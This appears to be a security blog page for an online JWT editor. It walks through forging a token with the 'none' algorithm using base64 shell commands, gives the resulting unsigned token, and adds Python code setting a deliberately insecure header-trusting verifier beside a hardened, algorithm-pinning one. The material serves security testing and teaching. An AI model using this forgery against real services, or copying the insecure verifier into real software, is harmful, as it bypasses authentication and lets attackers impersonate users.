Edit JWT Online (setting algorithm to none)
Online editor for a JWT token to use the "none" algorithm. Edit the header and the payload, get the encoded output.
One of the tests to ensure a JSON Web Token (JWT) is implemented securely is to try to alter the algorithm used to sign it. The signature is what confirms the token hasn't been modified by an attacker. If the verifier takes the algorithm from the token's own header and that algorithm is "none", it may skip the signature check completely. This means we can edit the content of the JWT and have it accepted, bypassing this important security feature.
Paste an encoded JWT below to edit it. The altered version appears in the last text box.
How to do this in Linux (if you don't have access to this page):
Start with the encoded token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
Split the encoded token into segments delimited by the "." character.
The first block is the header, decode that:
echo 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9' | base64 -d
Here, the result is:
{"alg":"HS256","typ":"JWT"}
You can manually edit this and alter the algorithm; here we're changing it to "none". Once changed, we base64 encode it again so it is usable:
echo -n '{"alg":"none","typ":"JWT"}' | base64
The result of that is:
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=
IMPORTANT: Remove the trailing "=" before we use it to replace the first part of the JWT. JWT segments use the base64url alphabet (RFC 7515) with no padding, so if the output also contains "+" or "/" characters, replace them with "-" and "_" respectively; the strings in this example happen not to contain any.
Follow the same process to edit the JWT payload (second encoded block). The token strips the base64 padding, and GNU base64 refuses input whose length isn't a multiple of 4, so append "==" to restore it before decoding:
echo 'eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ==' | base64 -d
Result:
{"sub":"1234567890","name":"John Doe","iat":1516239022}
We'll edit the name from John Doe to be Jane Doe and encode it:
echo -n '{"sub":"1234567890","name":"Jane Doe","iat":1516239022}' | base64
Result:
eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkphbmUgRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ==
If we're setting the algorithm to "none" then we don't want a signature. The format we'll get is:
{encoded header}.{encoded payload}.
Note the "." on the end. The signature would normally follow it, but because the header now says the algorithm is "none", no signature is supplied.
Our example becomes:
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkphbmUgRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
We've successfully edited a JWT and can test to see if the server accepts the edited version.
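Whether the server accepts it depends entirely on how its verifier is written. The following is an added example (not the page's online tool, and not any library's code) showing the two patterns side by side: an insecure verifier that reads the algorithm from the token header, and a hardened one that pins the algorithm server-side. It uses only the Python standard library, embeds the forged "none" token built above, and signs its own test token with a constructed secret; the secret value and function names are this example's own assumptions.

```python
"""Pinned-algorithm JWT (JWS compact) verifier beside the insecure pattern.

Added example, not the page's own tool. The secret below is constructed for
this demonstration only; the forged token is the one built in the walkthrough.
"""
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed secret for this example (not a real credential).
SECRET = b"example-hs256-secret-not-for-production"

# Token from the walkthrough above: alg set to "none", empty signature segment.
FORGED_NONE_TOKEN = (
    "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0."
    "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkphbmUgRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
)


def b64url_encode(raw: bytes) -> str:
    """JWT uses the URL-safe alphabet with '=' padding removed (RFC 7515)."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Restore the padding that base64url strips, then decode."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Issue a legitimately signed HS256 token (what a server does at login)."""
    header = {"alg": "HS256", "typ": "JWT"}
    header_b64 = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    payload_b64 = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = (header_b64 + "." + payload_b64).encode("ascii")
    sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return header_b64 + "." + payload_b64 + "." + b64url_encode(sig)


def verify_trusting_header(token: str, secret: bytes) -> Optional[dict]:
    """INSECURE pattern: the algorithm is read from the attacker-controlled header."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") == "none":          # the bug: signature check is skipped
        return json.loads(b64url_decode(payload_b64))
    signing_input = (header_b64 + "." + payload_b64).encode("ascii")
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return json.loads(b64url_decode(payload_b64))
    return None


def verify_pinned(token: str, secret: bytes, expected_alg: str = "HS256") -> Optional[dict]:
    """Hardened: the server decides the algorithm; the header must merely agree."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
    except (ValueError, UnicodeDecodeError):
        return None
    # Anything other than the configured algorithm is rejected, "none" included.
    if not isinstance(header, dict) or header.get("alg") != expected_alg:
        return None
    if not sig_b64:                          # an empty signature is never acceptable
        return None
    signing_input = (header_b64 + "." + payload_b64).encode("ascii")
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    try:
        provided = b64url_decode(sig_b64)
    except ValueError:
        return None
    if not hmac.compare_digest(expected, provided):   # constant-time comparison
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    print("insecure verifier accepts forged token:", verify_trusting_header(FORGED_NONE_TOKEN, SECRET))
    print("pinned verifier accepts forged token:  ", verify_pinned(FORGED_NONE_TOKEN, SECRET))
    good = sign_hs256({"sub": "1234567890", "name": "John Doe"}, SECRET)
    print("pinned verifier accepts signed token:  ", verify_pinned(good, SECRET))
```

The insecure function returns the edited "Jane Doe" payload for the forged token, while the pinned function returns None for it, for any token whose header claims a different algorithm, and for any token whose payload was changed after signing. The same pin-the-algorithm rule applies when using a JWT library: pass the expected algorithm explicitly rather than letting the library pick it up from the header.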
Got a comment or correction (I’m not perfect) for this post? Please leave a comment below.